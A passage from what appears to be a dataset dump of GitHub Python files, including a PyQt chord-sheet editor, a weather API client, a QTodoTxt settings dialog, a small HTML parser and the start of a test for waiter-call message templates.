*.cml)\")[0]\n if filePath:\n self.saveFile(filePath)\n\n def menuFileSaveAsAction(self):\n self.updateDocument()\n filePath = QFileDialog.getSaveFileName(self.window.tabWidget, 'Save file', self.getPath(\n \"workingPath\"), \"Chordsheet ML files (*.xml *.cml)\")[0]\n if filePath:\n self.saveFile(filePath)\n\n def saveFile(self, filePath):\n \"\"\"\n Saves a file to given file path and sets up environment.\n \"\"\"\n self.currentFilePath = filePath\n \n fileExt = os.path.splitext(self.currentFilePath)[1].lower()\n \n if fileExt == \".cma\":\n # At this stage we should never get here\n pass\n else: # if fileExt in [\".xml\", \".cml\"]:\n self.doc.saveXML(self.currentFilePath)\n \n self.lastDoc = copy(self.doc)\n self.setPath(\"workingPath\", self.currentFilePath)\n self.updateTitleBar() # as we may have a new filename\n\n def menuFileSavePDFAction(self):\n self.updateDocument()\n self.updatePreview()\n filePath = QFileDialog.getSaveFileName(self.window.tabWidget, 'Save file', self.getPath(\n \"lastExportPath\"), \"PDF files (*.pdf)\")[0]\n if filePath:\n self.renderer.savePDF(filePath)\n self.setPath(\"lastExportPath\", filePath)\n\n def menuFilePrintAction(self):\n if sys.platform == \"darwin\":\n pass\n # subprocess.call()\n else:\n pass\n\n @pyqtSlot()\n def menuFileCloseAction(self):\n self.saveWarning()\n\n def menuFileAboutAction(self):\n AboutDialog()\n\n def menuEditUndoAction(self):\n try:\n QApplication.focusWidget().undo() # see if the built in widget supports it\n except Exception:\n pass #  if not just fail silently\n\n def menuEditRedoAction(self):\n try:\n QApplication.focusWidget().redo()\n except Exception:\n pass\n\n def menuEditCutAction(self):\n try:\n QApplication.focusWidget().cut()\n except Exception:\n pass\n\n def menuEditCopyAction(self):\n try:\n QApplication.focusWidget().copy()\n except Exception:\n pass\n\n def menuEditPasteAction(self):\n try:\n QApplication.focusWidget().paste()\n except Exception:\n pass\n\n def saveWarning(self):\n \"\"\"\n Function to check if the document has unsaved data in it and offer to save it.\n \"\"\"\n self.updateDocument() # update the document to catch all changes\n\n if self.lastDoc == self.doc:\n return True\n else:\n wantToSave = UnsavedMessageBox().exec()\n\n if wantToSave == QMessageBox.Save:\n if not self.currentFilePath:\n filePath = QFileDialog.getSaveFileName(self.window.tabWidget, 'Save file', str(\n os.path.expanduser(\"~\")), \"Chordsheet ML files (*.xml *.cml)\")\n self.currentFilePath = filePath[0]\n self.doc.saveXML(self.currentFilePath)\n return True\n\n elif wantToSave == QMessageBox.Discard:\n return True\n \n else:\n return False\n\n def guitarVoicingAction(self):\n gdialog = GuitarDialog()\n\n voicing = gdialog.getVoicing()\n if voicing:\n self.window.guitarVoicingLineEdit.setText(voicing)\n\n def clearChordLineEdits(self):\n self.window.chordNameLineEdit.clear()\n self.window.guitarVoicingLineEdit.clear()\n self.window.pianoVoicingLineEdit.clear()\n # necessary on Mojave with PyInstaller (or previous contents will be shown)\n self.window.chordNameLineEdit.repaint()\n self.window.guitarVoicingLineEdit.repaint()\n self.window.pianoVoicingLineEdit.repaint()\n\n def clearSectionLineEdits(self):\n self.window.sectionNameLineEdit.clear()\n # necessary on Mojave with PyInstaller (or previous contents will be shown)\n self.window.sectionNameLineEdit.repaint()\n\n def clearBlockLineEdits(self):\n self.window.blockLengthLineEdit.clear()\n self.window.blockNotesLineEdit.clear()\n # necessary on Mojave with PyInstaller (or previous contents will be shown)\n self.window.blockLengthLineEdit.repaint()\n self.window.blockNotesLineEdit.repaint()\n\n def updateChordDict(self):\n \"\"\"\n Updates the dictionary used to generate the Chord menu (on the block tab)\n \"\"\"\n self.chordDict = {'None': None}\n self.chordDict.update({c.name: c for c in self.doc.chordList})\n self.window.blockChordComboBox.clear()\n self.window.blockChordComboBox.addItems(list(self.chordDict.keys()))\n\n def updateSectionDict(self):\n \"\"\"\n Updates the dictionary used to generate the Section menu (on the block tab)\n \"\"\"\n self.sectionDict = {s.name: s for s in self.doc.sectionList}\n self.window.blockSectionComboBox.clear()\n self.window.blockSectionComboBox.addItems(\n list(self.sectionDict.keys()))\n\n def removeChordAction(self):\n if self.window.chordTableView.selectionModel().hasSelection(): #  check for selection\n self.updateChords()\n\n row = self.window.chordTableView.selectionModel().currentIndex().row()\n oldName = self.window.chordTableView.model.item(row, 0).text()\n self.doc.chordList.pop(row)\n\n self.window.chordTableView.populate(self.doc.chordList)\n # remove the chord if any of the blocks have it attached\n for s in self.doc.sectionList:\n for b in s.blockList:\n if b.chord:\n if b.chord.name == oldName:\n b.chord = None\n self.window.blockTableView.populate(self.currentSection.blockList)\n self.clearChordLineEdits()\n self.updateChordDict()\n\n def addChordAction(self):\n success = False # initialise\n self.updateChords()\n\n cName = parseName(self.window.chordNameLineEdit.text())\n if cName:\n self.doc.chordList.append(Chord(cName))\n if self.window.guitarVoicingLineEdit.text() or self.window.pianoVoicingLineEdit.text():\n if self.window.guitarVoicingLineEdit.text():\n try:\n self.doc.chordList[-1].voicings['guitar'] = parseFingering(\n self.window.guitarVoicingLineEdit.text(), 'guitar')\n success = True #  chord successfully parsed\n except Exception:\n VoicingWarningMessageBox().exec() # Voicing is malformed, warn user\n if self.window.pianoVoicingLineEdit.text():\n try:\n self.doc.chordList[-1].voicings['piano'] = parseFingering(\n self.window.pianoVoicingLineEdit.text(), 'piano')\n success = True #  chord successfully parsed\n except Exception:\n VoicingWarningMessageBox().exec() # Voicing is malformed, warn user\n else:\n success = True #  chord successfully parsed\n else:\n ChordNameWarningMessageBox().exec() # Chord has no name, warn user\n\n if success == True: # if chord was parsed properly\n self.window.chordTableView.populate(self.doc.chordList)\n self.clearChordLineEdits()\n self.updateChordDict()\n\n def updateChordAction(self):\n success = False # see comments above\n if self.window.chordTableView.selectionModel().hasSelection(): #  check for selection\n self.updateChords()\n row = self.window.chordTableView.selectionModel().currentIndex().row()\n oldName = self.window.chordTableView.model.item(row, 0).text()\n cName = parseName(self.window.chordNameLineEdit.text())\n if cName:\n self.doc.chordList[row].name = cName\n if self.window.guitarVoicingLineEdit.text() or self.window.pianoVoicingLineEdit.text():\n if self.window.guitarVoicingLineEdit.text():\n try:\n self.doc.chordList[row].voicings['guitar'] = parseFingering(\n self.window.guitarVoicingLineEdit.text(), 'guitar')\n success = True #  chord successfully parsed\n except Exception:\n VoicingWarningMessageBox().exec() # Voicing is malformed, warn user\n if self.window.pianoVoicingLineEdit.text():\n try:\n self.doc.chordList[row].voicings['piano'] = parseFingering(\n self.window.pianoVoicingLineEdit.text(), 'piano')\n success = True #  chord successfully parsed\n except Exception:\n VoicingWarningMessageBox().exec() # Voicing is malformed, warn user\n else:\n success = True #  chord successfully parsed\n else:\n ChordNameWarningMessageBox().exec()\n\n if success == True:\n self.updateChordDict()\n self.window.chordTableView.populate(self.doc.chordList)\n # update the names of chords in all blocklists in case they've already been used\n for s in self.doc.sectionList:\n for b in s.blockList:\n if b.chord:\n if b.chord.name == oldName:\n b.chord.name = cName\n if self.currentSection and self.currentSection.blockList:\n self.window.blockTableView.populate(self.currentSection.blockList)\n self.clearChordLineEdits()\n\n def removeSectionAction(self):\n if self.window.sectionTableView.selectionModel().hasSelection(): #  check for selection\n self.updateSections()\n\n row = self.window.sectionTableView.selectionModel().currentIndex().row()\n self.doc.sectionList.pop(row)\n\n self.window.sectionTableView.populate(self.doc.sectionList)\n self.clearSectionLineEdits()\n self.updateSectionDict()\n\n def addSectionAction(self):\n self.updateSections()\n\n sName = self.window.sectionNameLineEdit.text()\n if sName and sName not in [s.name for s in self.doc.sectionList]:\n self.doc.sectionList.append(Section(name=sName))\n self.window.sectionTableView.populate(self.doc.sectionList)\n self.clearSectionLineEdits()\n self.updateSectionDict()\n else:\n # Section has no name or non unique, warn user\n SectionNameWarningMessageBox().exec()\n\n def updateSectionAction(self):\n if self.window.sectionTableView.selectionModel().hasSelection(): #  check for selection\n self.updateSections()\n row = self.window.sectionTableView.selectionModel().currentIndex().row()\n\n sName = self.window.sectionNameLineEdit.text()\n if sName and sName not in [s.name for s in self.doc.sectionList]:\n self.doc.sectionList[row].name = sName\n self.window.sectionTableView.populate(self.doc.sectionList)\n self.clearSectionLineEdits()\n self.updateSectionDict()\n else:\n # Section has no name or non unique, warn user\n SectionNameWarningMessageBox().exec()\n\n def removeBlockAction(self):\n if self.window.blockTableView.selectionModel().hasSelection(): #  check for selection\n self.updateBlocks(self.currentSection)\n\n row = self.window.blockTableView.selectionModel().currentIndex().row()\n self.currentSection.blockList.pop(row)\n\n self.window.blockTableView.populate(self.currentSection.blockList)\n\n def addBlockAction(self):\n self.updateBlocks(self.currentSection)\n\n try:\n #  can the value entered for block length be cast as a float\n bLength = float(self.window.blockLengthLineEdit.text())\n except Exception:\n bLength = False\n\n if bLength: # create the block\n self.currentSection.blockList.append(Block(bLength,\n chord=self.chordDict[self.window.blockChordComboBox.currentText(\n )],\n notes=(self.window.blockNotesLineEdit.text() if not \"\" else None)))\n self.window.blockTableView.populate(self.currentSection.blockList)\n self.clearBlockLineEdits()\n else:\n # show warning that length was not entered or in wrong format\n LengthWarningMessageBox().exec()\n\n def updateBlockAction(self):\n if self.window.blockTableView.selectionModel().hasSelection(): #  check for selection\n self.updateBlocks(self.currentSection)\n\n try:\n #  can the value entered for block length be cast as a float\n bLength = float(self.window.blockLengthLineEdit.text())\n except Exception:\n bLength = False\n\n row = self.window.blockTableView.selectionModel().currentIndex().row()\n if bLength:\n self.currentSection.blockList[row] = (Block(bLength,\n chord=self.chordDict[self.window.blockChordComboBox.currentText(\n )],\n notes=(self.window.blockNotesLineEdit.text() if not \"\" else None)))\n self.window.blockTableView.populate(\n self.currentSection.blockList)\n self.clearBlockLineEdits()\n else:\n LengthWarningMessageBox().exec()\n\n def generateAction(self):\n self.updateDocument()\n self.updatePreview()\n\n def updatePreview(self):\n \"\"\"\n Update the preview shown by rendering a new PDF and drawing it to the scroll area.\n \"\"\"\n try:\n self.currentPreview = self.renderer.stream()\n except Exception:\n QMessageBox.warning(self, \"Preview failed\", \"Could not update the preview.\",\n buttons=QMessageBox.Ok, defaultButton=QMessageBox.Ok)\n\n self.window.pdfArea.update(self.currentPreview)\n\n def updateTitleBar(self):\n \"\"\"\n Update the application's title bar to reflect the current document.\n \"\"\"\n if self.currentFilePath:\n self.setWindowTitle(_version.appName + \" – \" +\n os.path.basename(self.currentFilePath))\n else:\n self.setWindowTitle(_version.appName)\n\n def updateChords(self):\n \"\"\"\n Update the chord list by reading the table.\n \"\"\"\n chordTableList = []\n for i in range(self.window.chordTableView.model.rowCount()):\n chordTableList.append(\n Chord(parseName(self.window.chordTableView.model.item(i, 0).text()))),\n if self.window.chordTableView.model.item(i, 1).text():\n chordTableList[-1].voicings['guitar'] = parseFingering(\n self.window.chordTableView.model.item(i, 1).text(), 'guitar')\n if self.window.chordTableView.model.item(i, 2).text():\n chordTableList[-1].voicings['piano'] = parseFingering(\n self.window.chordTableView.model.item(i, 2).text(), 'piano')\n\n self.doc.chordList = chordTableList\n\n def matchSection(self, nameToMatch):\n \"\"\"\n Given the name of a section, this function checks if it is already present in the document. \n If it is, it's returned. If not, a new section with the given name is returned.\n \"\"\"\n section = None\n for s in self.doc.sectionList:\n if s.name == nameToMatch:\n section = s\n break\n if section is None:\n section = Section(name=nameToMatch)\n return section\n\n def updateSections(self):\n \"\"\"\n Update the section list by reading the table\n \"\"\"\n sectionTableList = []\n for i in range(self.window.sectionTableView.model.rowCount()):\n sectionTableList.append(self.matchSection(\n self.window.sectionTableView.model.item(i, 0).text()))\n\n self.doc.sectionList = sectionTableList\n\n def updateBlocks(self, section):\n \"\"\"\n Update the block list by reading the table.\n \"\"\"\n\n blockTableList = []\n for i in range(self.window.blockTableView.model.rowCount()):\n blockLength = float(\n self.window.blockTableView.model.item(i, 1).text())\n blockChord = self.chordDict[(self.window.blockTableView.model.item(\n i, 0).text() if self.window.blockTableView.model.item(i, 0).text() else \"None\")]\n blockNotes = self.window.blockTableView.model.item(i, 2).text(\n ) if self.window.blockTableView.model.item(i, 2).text() else None\n blockTableList.append(\n Block(blockLength, chord=blockChord, notes=blockNotes))\n\n section.blockList = blockTableList\n\n def updateDocument(self):\n \"\"\"\n Update the Document object by reading values from the UI.\n \"\"\"\n self.doc.title = self.window.titleLineEdit.text(\n ) # Title can be empty string but not None\n self.doc.subtitle = (self.window.subtitleLineEdit.text(\n ) if self.window.subtitleLineEdit.text() else None)\n self.doc.composer = (self.window.composerLineEdit.text(\n ) if self.window.composerLineEdit.text() else None)\n self.doc.arranger = (self.window.arrangerLineEdit.text(\n ) if self.window.arrangerLineEdit.text() else None)\n self.doc.tempo = (self.window.tempoLineEdit.text()\n if self.window.tempoLineEdit.text() else None)\n self.doc.timeSignature = int(self.window.timeSignatureSpinBox.value(\n )) if self.window.timeSignatureSpinBox.value() else self.doc.timeSignature\n\n self.style.pageSize = pageSizeDict[self.pageSizeSelected]\n self.style.unit = unitDict[self.unitSelected]\n self.style.leftMargin = float(self.window.leftMarginLineEdit.text(\n )) if self.window.leftMarginLineEdit.text() else self.style.leftMargin\n self.style.rightMargin = float(self.window.rightMarginLineEdit.text(\n )) if self.window.rightMarginLineEdit.text() else self.style.rightMargin\n self.style.topMargin = float(self.window.topMarginLineEdit.text(\n )) if self.window.topMarginLineEdit.text() else self.style.topMargin\n self.style.bottomMargin = float(self.window.bottomMarginLineEdit.text(\n )) if self.window.bottomMarginLineEdit.text() else self.style.bottomMargin\n self.style.lineSpacing = float(self.window.lineSpacingDoubleSpinBox.value(\n )) if self.window.lineSpacingDoubleSpinBox.value() else self.style.lineSpacing\n\n # make sure the unit width isn't too wide to draw!\n if self.window.beatWidthLineEdit.text():\n if (self.style.pageSize[0] - 2 * self.style.leftMargin * mm) >= (float(self.window.beatWidthLineEdit.text()) * 2 * self.doc.timeSignature * mm):\n self.style.unitWidth = float(\n self.window.beatWidthLineEdit.text())\n else:\n maxBeatWidth = (\n self.style.pageSize[0] - 2 * self.style.leftMargin * mm) / (2 * self.doc.timeSignature * mm)\n QMessageBox.warning(self, \"Out of range\", \"Beat width is out of range. It can be a maximum of {}.\".format(\n maxBeatWidth), buttons=QMessageBox.Ok, defaultButton=QMessageBox.Ok)\n\n # update chords, sections, blocks\n self.updateChords()\n self.updateSections()\n if self.currentSection:\n self.updateBlocks(self.currentSection)\n\n self.style.font = (\n 'FreeSans' if self.style.useIncludedFont else 'HelveticaNeue')\n # something for the font box here\n\n\nclass GuitarDialog(QDialog):\n \"\"\"\n Dialogue to allow the user to enter a guitar chord voicing. Not particularly advanced at present!\n May be extended in future.\n \"\"\"\n\n def __init__(self):\n super().__init__()\n self.UIFileLoader(\n str(os.path.join(scriptDir, 'ui', 'guitardialog.ui')))\n\n def UIFileLoader(self, ui_file):\n ui_file = QFile(ui_file)\n ui_file.open(QFile.ReadOnly)\n\n self.dialog = uic.loadUi(ui_file)\n ui_file.close()\n\n def getVoicing(self):\n \"\"\"\n Show the dialogue and return the voicing that has been entered.\n \"\"\"\n if self.dialog.exec_() == QDialog.Accepted:\n result = [self.dialog.ELineEdit.text(),\n self.dialog.ALineEdit.text(),\n self.dialog.DLineEdit.text(),\n self.dialog.GLineEdit.text(),\n self.dialog.BLineEdit.text(),\n self.dialog.eLineEdit.text()]\n resultJoined = \",\".join(result)\n return resultJoined\n else:\n return None\n\n\nclass AboutDialog(QDialog):\n \"\"\"\n Dialogue showing information about the program.\n \"\"\"\n\n def __init__(self):\n super().__init__()\n self.UIFileLoader(str(os.path.join(scriptDir, 'ui', 'aboutdialog.ui')))\n\n icon = QImage(str(os.path.join(scriptDir, 'ui', 'icon.png')))\n self.dialog.iconLabel.setPixmap(QPixmap.fromImage(icon).scaled(self.dialog.iconLabel.width(\n ), self.dialog.iconLabel.height(), Qt.KeepAspectRatio, transformMode=Qt.SmoothTransformation))\n\n self.dialog.versionLabel.setText(\"Version \" + _version.version)\n\n self.dialog.exec()\n\n def UIFileLoader(self, ui_file):\n ui_file = QFile(ui_file)\n ui_file.open(QFile.ReadOnly)\n\n self.dialog = uic.loadUi(ui_file)\n ui_file.close()\n\n\nclass UnsavedMessageBox(QMessageBox):\n \"\"\"\n Message box to alert the user of unsaved changes and allow them to choose how to act.\n \"\"\"\n\n def __init__(self):\n super().__init__()\n\n self.setIcon(QMessageBox.Question)\n self.setWindowTitle(\"Unsaved changes\")\n self.setText(\"The document has been modified.\")\n self.setInformativeText(\"Do you want to save your changes?\")\n self.setStandardButtons(\n QMessageBox.Save | QMessageBox.Discard | QMessageBox.Cancel)\n self.setDefaultButton(QMessageBox.Save)\n\n\nclass UnreadableMessageBox(QMessageBox):\n \"\"\"\n Message box to warn the user that the chosen file cannot be opened.\n \"\"\"\n\n def __init__(self):\n super().__init__()\n\n self.setIcon(QMessageBox.Warning)\n self.setWindowTitle(\"File cannot be opened\")\n self.setText(\"The file you have selected cannot be opened.\")\n self.setInformativeText(\"Please make sure it is in the right format.\")\n self.setStandardButtons(QMessageBox.Ok)\n self.setDefaultButton(QMessageBox.Ok)\n\n\nclass ChordNameWarningMessageBox(QMessageBox):\n \"\"\"\n Message box to warn the user that a chord must have a name\n \"\"\"\n\n def __init__(self):\n super().__init__()\n\n self.setIcon(QMessageBox.Warning)\n self.setWindowTitle(\"Unnamed chord\")\n self.setText(\"Chords must have a name.\")\n self.setInformativeText(\"Please give your chord a name and try again.\")\n self.setStandardButtons(QMessageBox.Ok)\n self.setDefaultButton(QMessageBox.Ok)\n\n\nclass SectionNameWarningMessageBox(QMessageBox):\n \"\"\"\n Message box to warn the user that a section must have a name\n \"\"\"\n\n def __init__(self):\n super().__init__()\n\n self.setIcon(QMessageBox.Warning)\n self.setWindowTitle(\"Unnamed section\")\n self.setText(\"Sections must have a unique name.\")\n self.setInformativeText(\n \"Please give your section a unique name and try again.\")\n self.setStandardButtons(QMessageBox.Ok)\n self.setDefaultButton(QMessageBox.Ok)\n\n\nclass VoicingWarningMessageBox(QMessageBox):\n \"\"\"\n Message box to warn the user that the voicing entered could not be parsed\n \"\"\"\n\n def __init__(self):\n super().__init__()\n\n self.setIcon(QMessageBox.Warning)\n self.setWindowTitle(\"Malformed voicing\")\n self.setText(\n \"The voicing you entered was not understood and has not been applied.\")\n self.setInformativeText(\n \"Please try re-entering it in the correct format.\")\n self.setStandardButtons(QMessageBox.Ok)\n self.setDefaultButton(QMessageBox.Ok)\n\n\nclass LengthWarningMessageBox(QMessageBox):\n \"\"\"\n Message box to warn the user that a block must have a length\n \"\"\"\n\n def __init__(self):\n super().__init__()\n\n self.setIcon(QMessageBox.Warning)\n self.setWindowTitle(\"Block without valid length\")\n self.setText(\"Blocks must have a whole number length.\")\n self.setInformativeText(\n \"Please enter a valid length for your block and try again.\")\n self.setStandardButtons(QMessageBox.Ok)\n self.setDefaultButton(QMessageBox.Ok)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n\n d = Document()\n s = Style()\n\n # pass first argument as filename\n w = DocumentWindow(d, s, filename=(\n sys.argv[1] if len(sys.argv) > 1 else None))\n w.show()\n\n sys.exit(app.exec_())\n","repo_name":"ivanholmes/chordsheet","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":40397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39388000835","text":"import requests\nfrom requests.structures import CaseInsensitiveDict\nfrom CONF import COORDS_KEY, COORDS_KEY_WEATHER\nfrom utilities import rename_country\n\n\nclass API(object):\n \"\"\"\n management class for the API functionality of the app\n \"\"\"\n def __init__(self):\n self.loc_list = []\n self.max_temp = {}\n self.min_temp = {}\n self.humidity = {}\n self.status = {}\n self.location = \"\"\n self.op = -1\n\n def get_loc(self, location):\n \"\"\"\n get coords for the provided location\n :param location: a string describing the searched location\n :return:\n \"\"\"\n self.location = location\n\n # api url\n url = \"https://www.mapquestapi.com/geocoding/v1/\" \\\n \"address?key=%s\" % COORDS_KEY\n\n # setting up headers\n headers = CaseInsensitiveDict()\n headers[\"Content-Type\"] = \"application/json\"\n\n # setting up requested data for the program\n data = '{\"location\": \"%s\",\"options\": {\"thumbMaps\": true}}' % location\n\n # request\n try:\n resp = requests.post(url, headers=headers, data=data.encode('utf-8'))\n except ConnectionError:\n return False\n\n if resp.status_code != 200:\n return False\n\n resp_dict = resp.json()\n self._filter_relevant_locations(resp_dict[\"results\"][0][\"locations\"],\n location)\n\n return len(self.loc_list) != 0\n\n def _filter_relevant_locations(self, location_list, location):\n \"\"\"\n Isolate only the relevant results that return from the api\n :param location_list: the list of returned values\n :param location: the location received by the user\n :return: filtered list\n \"\"\"\n locations = [[loc[\"adminArea5\"], loc[\"adminArea1\"],\n loc[\"adminArea3\"], loc[\"adminArea4\"], loc[\"displayLatLng\"]]\n for loc in location_list]\n\n # Isolating the valid locations\n for loc in locations:\n for attr in loc[:-1]:\n if attr.lower() == location.lower():\n self.loc_list.append(loc)\n break\n elif rename_country(attr).lower() == location.lower():\n loc[1] = rename_country(location).title()\n self.loc_list.append(loc)\n break\n\n return self.loc_list\n\n def choose_city(self, index):\n \"\"\"\n Given the chosen location by the user, get the weather data\n :param index: the chosen location from self.loc_list\n :return: self after data added.\n \"\"\"\n self.op = index\n if len(self.loc_list) == 0:\n raise Exception(\"no valid location available\")\n\n lat = self.loc_list[index][4][\"lat\"]\n lon = self.loc_list[index][4][\"lng\"]\n url = \"https://api.openweathermap.org/data/2.5/\" \\\n \"onecall?lat=%s&lon=%s&appid=\" \\\n \"%s\" % (lat, lon, COORDS_KEY_WEATHER)\n\n try:\n resp = requests.post(url, timeout=3)\n except ConnectionError:\n return False\n\n if resp.status_code != 200:\n return resp.status_code\n\n data_dict = resp.json()\n self._process_weather_response(data_dict)\n\n return self\n\n def _process_weather_response(self, data_dict):\n self.max_temp = {day: round(data[\"temp\"][\"max\"] - 273.1, 2) for\n day, data in enumerate(data_dict[\"daily\"])}\n self.min_temp = {day: round(data[\"temp\"][\"min\"] - 273.1, 2) for\n day, data in enumerate(data_dict[\"daily\"])}\n self.humidity = {day: data[\"humidity\"] for\n day, data in enumerate(data_dict[\"daily\"])}\n self.status = {day: data[\"weather\"][0][\"main\"] for\n day, data in enumerate(data_dict[\"daily\"])}\n\n\nif __name__ == \"__main__\":\n api = API()\n","repo_name":"omriez/BestFW","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3964,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22789098024","text":"import sys\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\nfrom qtodotxt.ui.dialogs.settingsui import Ui_SettingsUI\n\n\nclass Settings(QtWidgets.QDialog):\n\n def __init__(self, maincontroller):\n QtWidgets.QDialog.__init__(self, maincontroller.view)\n self.maincontroller = maincontroller\n self.ui = Ui_SettingsUI()\n self.ui.setupUi(self)\n self.settings = QtCore.QSettings()\n self.setWindowFlags(\n QtCore.Qt.Dialog |\n QtCore.Qt.MSWindowsFixedSizeDialogHint |\n QtCore.Qt.WindowStaysOnBottomHint |\n QtCore.Qt.WindowSystemMenuHint |\n QtCore.Qt.WindowTitleHint |\n QtCore.Qt.WindowCloseButtonHint\n )\n\n self.load_settings()\n self.connect_all()\n\n def load_settings(self):\n self._int_settings_to_cb(\"auto_save\", self.ui.autoSaveCheckBox)\n self._int_settings_to_cb(\"singleton\", self.ui.singletonCheckBox, 0)\n self._int_settings_to_cb(\"auto_archive\", self.ui.autoArchiveCheckBox, 0)\n self._int_settings_to_cb(\"add_created_date\", self.ui.addCreatedDateCheckBox, 0)\n self._int_settings_to_cb(\"confirm_complete\", self.ui.confirmCompletionCheckBox)\n self._int_settings_to_cb(\"show_delete\", self.ui.deleteActionCheckBox, 1)\n priority = self.settings.value(\"lowest_priority\", \"D\")\n self.ui.lowestPriorityLineEdit.setText(priority)\n self._int_settings_to_cb(\"enable_tray\", self.ui.trayCheckBox, 0)\n self._int_settings_to_cb(\"hide_to_tray\", self.ui.hideToTrayCheckBox, 0)\n self._int_settings_to_cb(\"hide_on_startup\", self.ui.hideOnStartupCheckBox, 0)\n self._int_settings_to_cb(\"close_to_tray\", self.ui.closeToTrayCheckBox, 0)\n\n val = int(self.settings.value(\"enable_tray\", 0))\n self.ui.hideToTrayCheckBox.setEnabled(val)\n self.ui.hideOnStartupCheckBox.setEnabled(val)\n self.ui.closeToTrayCheckBox.setEnabled(val)\n\n val = self.settings.value(\"color_schem\", \"\")\n index = self.ui.colorSchemComboBox.findText(val, QtCore.Qt.MatchFixedString)\n if index >= 0:\n self.ui.colorSchemComboBox.setCurrentIndex(index)\n\n def _int_settings_to_cb(self, name, checkBox, default=1):\n val = int(self.settings.value(name, default))\n if val:\n checkBox.setCheckState(QtCore.Qt.Checked)\n else:\n checkBox.setCheckState(QtCore.Qt.Unchecked)\n\n def connect_all(self):\n self.ui.closeButton.clicked.connect(self.close)\n self.ui.singletonCheckBox.stateChanged.connect(self.setSingletonCheckBox)\n self.ui.autoSaveCheckBox.stateChanged.connect(self.setAutoSave)\n self.ui.autoArchiveCheckBox.stateChanged.connect(self.setAutoArchive)\n self.ui.addCreatedDateCheckBox.stateChanged.connect(self.setAddCreatedDate)\n self.ui.confirmCompletionCheckBox.stateChanged.connect(self.setConfirmCompletion)\n self.ui.deleteActionCheckBox.stateChanged.connect(self.setDeleteAction)\n self.ui.lowestPriorityLineEdit.textChanged.connect(self.setLowestPriority)\n self.ui.trayCheckBox.stateChanged.connect(self.enableTray)\n self.ui.hideToTrayCheckBox.stateChanged.connect(self.setHideToTray)\n self.ui.hideOnStartupCheckBox.stateChanged.connect(self.setHideOnStartup)\n self.ui.closeToTrayCheckBox.stateChanged.connect(self.setCloseToTray)\n self.ui.colorSchemComboBox.currentIndexChanged.connect(self.setColorSchemCombo)\n\n def _save_int_cb(self, name, val):\n if val == 0:\n self.settings.setValue(name, 0)\n else:\n self.settings.setValue(name, 1)\n\n def setSingletonCheckBox(self, val):\n self._save_int_cb(\"singleton\", val)\n\n def setAutoSave(self, val):\n self._save_int_cb(\"auto_save\", val)\n\n def setDeleteAction(self, val):\n self._save_int_cb(\"show_delete\", val)\n\n def setAutoArchive(self, val):\n self._save_int_cb(\"auto_archive\", val)\n\n def setAddCreatedDate(self, val):\n self._save_int_cb(\"add_created_date\", val)\n\n def setConfirmCompletion(self, val):\n self._save_int_cb(\"confirm_complete\", val)\n\n def setLowestPriority(self, text):\n self.settings.setValue(\"lowest_priority\", text)\n\n def enableTray(self, val):\n self._save_int_cb(\"enable_tray\", val)\n self.ui.hideToTrayCheckBox.setEnabled(val)\n self.ui.hideOnStartupCheckBox.setEnabled(val)\n self.ui.closeToTrayCheckBox.setEnabled(val)\n\n def setHideToTray(self, val):\n self._save_int_cb(\"hide_to_tray\", val)\n\n def setHideOnStartup(self, val):\n self._save_int_cb(\"hide_on_startup\", val)\n\n def setCloseToTray(self, val):\n self._save_int_cb(\"close_to_tray\", val)\n\n def closeEvent(self, event):\n self.deleteLater()\n self.maincontroller.view.show()\n\n def setColorSchemCombo(self, val):\n name = self.ui.colorSchemComboBox.itemText(val)\n self.settings.setValue(\"color_schem\", name)\n\n\nif __name__ == \"__main__\":\n QtCore.QCoreApplication.setOrganizationName(\"QTodoTxt\")\n QtCore.QCoreApplication.setApplicationName(\"QTodoTxt\")\n app = QtGui.QApplication(sys.argv)\n s = Settings(None)\n s.show()\n sys.exit(app.exec_())\n","repo_name":"QTodoTxt/QTodoTxt","sub_path":"qtodotxt/ui/dialogs/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":5249,"program_lang":"python","lang":"en","doc_type":"code","stars":386,"dataset":"github-code","pt":"66"} +{"seq_id":"39921221133","text":"from config import *\n\n\ndef parser_02(page: str):\n soup = BS(page, 'html.parser')\n cards = soup.find('div', class_='card-common').find_all('section', class_='common-text b-bottom pb-3')\n out_list = []\n for card in cards:\n tmp = list(card.stripped_strings)[0]\n out_list.append(tmp)\n return out_list\n\n\nif __name__ == '__main__':\n change_current_dir()\n pages = load_pages()\n list_ressult = run_parser(parser_02, pages)\n stdout.write(json.dumps(sum(list_ressult, [])))","repo_name":"work-f999145/work_001","sub_path":"multi and aihttp/scripts/parser_02.py","file_name":"parser_02.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33530179182","text":"from urllib import parse\n\nimport jinja2\nimport pytest\n\nGROUP_CHAT_ID = 1000000\nTABLE_UUID = 'uuid__1'\nTABLE_POS_ID = 'table_id__1'\nCOMMENT = 'Привет, можно мне счёт?'\n\n\ndef telegram_render(context, call_waiter_type: str, **kwargs) -> str:\n templates = (\n context.config.EATS_INTEGRATION_OFFLINE_ORDERS_TELEGRAM_TEMPLATES\n )\n template = templates['call_waiter'][call_waiter_type]\n environment = jinja2.Environment()\n return environment.from_string(template).render(**kwargs)\n\n\n@pytest.mark.parametrize(\n ('params', 'result_kwargs'),\n (\n ({'uuid': TABLE_UUID}, {'table': TABLE_POS_ID}),\n (\n {'uuid': TABLE_UUID, 'call_waiter_type': 'call'},\n {'table': TABLE_POS_ID},\n ),\n (\n {'uuid': TABLE_UUID, 'call_waiter_type': 'cash_payment'},\n {'table': TABLE_POS_ID},\n ),\n (\n {'uuid': TABLE_UUID, 'comment': COMMENT},\n {'table': TABLE_POS_ID, 'comment': COMMENT},\n ),\n (\n {\n 'uuid': TABLE_UUID,\n 'comment': COMMENT,\n 'call_waiter_type': 'call',\n },\n {'table': TABLE_POS_ID, 'comment': COMMENT},\n ),\n (\n {\n 'uuid': TABLE_UUID,\n 'comment': COMMENT,\n 'call_waiter_type': 'cash_payment',\n },\n {'table': TABLE_POS_ID, 'comment': COMMENT},\n ),\n ),\n)\n@pytest.mark.pgsql(\n 